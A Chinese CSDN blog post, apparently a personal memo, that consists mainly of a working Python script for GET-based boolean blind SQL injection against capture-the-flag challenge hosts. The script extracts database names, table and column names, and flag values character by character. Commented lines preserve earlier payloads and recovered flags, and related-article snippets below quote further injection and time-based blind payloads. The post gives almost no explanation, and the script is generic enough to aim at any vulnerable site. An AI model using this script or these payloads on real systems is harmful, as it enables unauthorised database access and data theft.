SQL布尔盲注代码示例

最新推荐文章于 2024-01-03 21:12:35 发布
最新推荐文章于 2024-01-03 21:12:35 发布
阅读量137 收藏
点赞数
分类专栏: webctf 文章标签: python sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51326092/article/details/119722070
版权
该博客内容涉及Python编程实现GET型SQL注入攻击的代码示例,通过遍历ASCII码查找数据库中的敏感信息。主要操作包括对database()、group_concat()函数的使用,以及针对'flag'表中的'value'字段进行注入尝试。
摘要由CSDN通过智能技术生成

贴个代码,防止忘记
GET型:

import requests
import time
flag=''
#key="ERR"
#url="http://bf06151e-232d-4024-8223-6d6171dfd75a.node4.buuoj.cn/search.php?"
key="student number not exists"
url="http://6a0bfa86-f4c3-45e5-907e-ba518a2fbf6d.node4.buuoj.cn:81?"
for i in range(1,60):
    l=33
    r=127
    while(l<r):
        mid=(l+r)>>1
        #data="id=1^(ascii(substr(database(),%d,1))>%d)"%(i,mid)
        #data="id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),%d,1))>%d)" % (i,mid)
        #F1naI1y, Flaaaaag
        #data = "id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)" % (i, mid)
        #id,fl4gawsl//id,username,password
        #data = "id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)" % (i, mid)
        #flag{5ca4b86b-8846-40c7-b9a1-1ea844b31fa9}
        data="stunum=1^(ascii(substr((select(group_concat(value))from(flag)),%d,1))>%d)" % (i, mid)
        #flag{dddc2daa-a7a6-aed-b44d-b71197d3f46}
        res=requests.get(url+data)
        time.sleep(1)
        if key in res.text:
            l=mid+1
        else:
            r=mid
        if(mid==127 or mid==33):
            break
    flag=flag+chr(r)
    print(flag)
print(flag)
Sakura-501
关注
专栏目录
布尔盲注需简化代码
weixin_55347427的博客
08-02 155
可封装函数,整合代码,这个太冗余
SQL盲注篇之布尔盲注
weixin_47785246的博客
07-11 3045
简单介绍SQL注入中的盲注,通过靶场的练习,演示SQL盲注的一些常用方法与思路。
盲注代码
weixin_33875839的博客
09-28 166
判断数据库名的长度 小于5and length(database()) = 4或者:通过返回时间来判断数据库名的长度and if(length(database()) <5,sleep(10),1) --猜库名and ascii(substr(database(),1,1)) >=65 (65为asii值)猜表的数量and (select count(t...
数据库盲注php代码
明哥哥知识分享
08-17 205
数据库自动盲注代码 <?php function juhecurl($url,$params=false,$ispost=0){ $httpInfo = array(); $ch = curl_init(); curl_setopt( $ch, CURLOPT_HTTP_VERSION , CURL_HTTP_VERSION_1_1 ); curl_setopt( $ch, CURLOPT_USERAGENT , 'Mozilla/5.0 (Windows NT 10
mysql盲注代码
萧刚
10-09 760
盲注代码 ',(select/**/if((select/**/ord(substr(user(),1,1)))=114,sleep(3),0)),1)#
Less-8(盲注--布尔盲注
老司机开代码的博客
08-03 1258
文章目录布尔盲注1. 关卡分析2. 盲注思路3. 编写工具进行通关 布尔盲注 在前面的练习中,也涉及到了布尔盲注的解题过程,思路都是一样的。自己构造判断语句强制页面进行判断并根据返回结果查看判断的正确性。 1. 关卡分析 本次的关卡是less-8,首先我们来分析一下这个页面。通过多次的尝试我们发现,如果输入的是true,那么就会返回一个You are in......,而如果是false,则不会返...
sqlserver数据库布尔盲注_SQL注入之基于布尔盲注详解
weixin_30623181的博客
12-24 1284
基于布尔盲注Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。本次的示例就是Less-8。通过进行下面的语句的注入测试http://localhost...
sql注入-布尔盲注脚本
最新发布
m0_58853680的博客
01-03 440
获取cms_users表中的username和password字段的值,并用冒号分隔(使用。USER_AGENT:模拟浏览器请求时使用的User-Agent头信息。实时打印已获取的部分数据库名,并在获取完整个名字后显示最终结果。若成功获取到长度不为None,则调用get_database_获取名为cms_users表的所有列名(同样使用group_接收一个参数content_length表示数据库名的长度。该函数利用SQL注入漏洞尝试获取数据库名或表名的长度。获取当前数据库中的所有表名(使用group_
sql盲注 解决_SQL注入之基于布尔盲注详解
weixin_39638086的博客
12-19 559
基于布尔盲注Web的页面的仅仅会返回True和False。那么布尔盲注就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。由于本次是布尔注入,手注无法完整地进行脱裤。所以在本节需要编写大量的代码来帮助我们进行SQL注入,得到数据。所以在这章里面会有很多的Python代码。本次的示例就是Less-8。通过进行下面的语句的注入测试http://localhost...
python实现sql布尔盲注
10-12
SQL布尔盲注是一种利用SQL注入漏洞的攻击方式,通过构造特定的SQL语句,判断某个条件是否成立,从而获取数据库中的信息。Python可以通过requests库发送HTTP请求,用布尔盲注进行攻击。 以下是一个简单的Python代码...
【Less-8】盲注布尔盲注
ssrf
10-29 1593
目录一、知识铺垫1、substr字符串截取函数2、sql中limit使用3、python中的string模块二、布尔盲注复现1、测试注入点2、判断数据库名长度3、猜数据库名4、判断表名长度5、猜表名6、判断字段名长度7、猜字段名8、判断数据长度9、猜数据 一、知识铺垫 SQL操作函数: 1、substr字符串截取函数 语法: substr(string,start,length) 例如: select substr(‘abcdefg’,3,4) from dual;【结果是cdef】 select .
sql注入--布尔盲注
pakho_C的博客
01-02 1321
sql注入–布尔盲注 靶场:sqli-labs-master 下载链接:靶场下载链接 第8关 盲注 php源码 <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id'])) { $id=$_GET['id']; //logging the conn
SQL注入原理-布尔盲注
T1ngSh0w的博客
09-15 2373
SQL注入原理-布尔盲注+手写python脚本
SQL注入-布尔盲注
acepanhuan的博客
02-10 1735
学习SQL注入方法之盲注
sql 布尔盲注 python脚本实现
sophia9301的博客
10-12 7701
渣渣一枚,把学习sql注入过程中遇到的一些问题记录下来,以供日后参考。 按照网上教程注入时发现过滤了union = < > ,顿时就一脸懵逼,因为不会构造sql语句,更不会绕过,最后在师父的指导下,首先通过手工注入,注入出了数据库名及长度。 1.数据库名长度: http://XXX.XXX.XX/sql.php? id=345’ and length(database()) like 1 an
SQL布尔盲注常用语句
孤的博客
08-23 2989
过程 1.判断是否存在注入,注入字符型还是数字型 2.猜解当前数据库名 数据库长度→库名 3.数据库中的表名 几个表→长度→名称 4.表中的字段名 字段个数→长度→名称 5.数据 判断 1’ and ‘1’=‘1 1’ and ‘1’='2 2.库名 1’ and length(database())>3# 1’ and length(database())=5 # 1’ and mid...
SQL注入——布尔盲注,时间盲注,宽字节注入
18年3月萌新白帽子
06-11 5556
布尔盲注1.布尔盲注利用前提页面没有显示位,没有输出SQL语句执行错误信息,只能通过页面返回正常不正常来判断是否存在注入缺点:速度太慢,消耗大量时间布尔盲注思维导图:布尔盲注常用语句:substr(string,num start,num length)string 为字符串string 为字符串length 为长度ascii( )函数作用:返回字符串str的字符ASCII码值。如果str是空字符...
布尔盲注详解
热门推荐
AaronLuo
08-27 1万+
布尔盲注 布尔盲注一般适用于页面没有回显字段(不支持联合查询),且web页面返回True 或者 false,构造SQL语句,利用and,or等关键字来其后的语句 true 、 false使web页面返回true或者false,从而达到注入的目的来获取信息 ascii() 函数,返回字符ascii码值 参数 : str单字符 length() 函数,返回字符串的长度 参数 : str 字...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sakura-501

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值